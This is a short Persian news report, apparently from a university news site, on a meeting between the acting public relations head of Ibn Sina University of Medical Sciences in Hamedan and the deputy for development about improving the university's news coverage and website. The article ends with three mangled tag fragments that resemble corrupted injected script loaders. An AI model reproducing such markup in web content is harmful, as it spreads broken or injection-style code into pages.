دیدار سرپرست روابط عمومی دانشگاه با معاون توسعه برای بررسی دغدغه‌ها و ارتقای روابط عمومی

سرپرست روابط عمومی دانشگاه علوم پزشکی ابن‌سینا در دیدار با معاون توسعه مدیریت و منابع دانشگاه در خصوص ارتقای اطلاع‌رسانی روابط عمومی دانشگاه تبادل نظر کردند.

به گزارش پایگاه خبری وب‌دا در همدان، مهندس رحیمی با تبریک انتصاب دکتر طاهری ضمن قدردانی از زحمات و تلاشهای مدیران پیشین و کارکنان این حوزه از کارکنان این حوزه به عنوان نیروهای توانمند، هنرمند، شریف، خوش‌قلم و خوش‌بیان یاد کرد که اقدامات، خدمات، گزارش عملکرد و اخبار دانشگاه را هنرمندانه، گیرا و تاثیرگذار به عموم مردم منعکس می‌کنند.

وی افزود: کارکنان روابط عمومی منشا خدمات خوبی برای مجموعه دانشگاه هستند و امید می‌رود کارکنان این مجموعه بیش از پیش در انجام وظایف خود موفق باشند.

سرپرست روابط عمومی دانشگاه علوم پزشکی ابن سینا استفاده از نظرات و تجربیات معاونت توسعه دانشگاه را راهگشای بسیاری از مسائل دانست و صداقت در انجام وظایف را یکی از موضوعات مهم و از اصول کاری خود عنوان کرد.

دکتر طاهری با تاکید بر در اولویت بودن ارائه گزارشهای بموقع توسط روابط عمومی دانشگاه به بیان دیدگاههای خود در خصوص  ارتقای سایت دانشگاه، اهمیت سرعت، دقت و کیفیت مطالب ارائه شده توسط روابط عمومی پرداخت.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>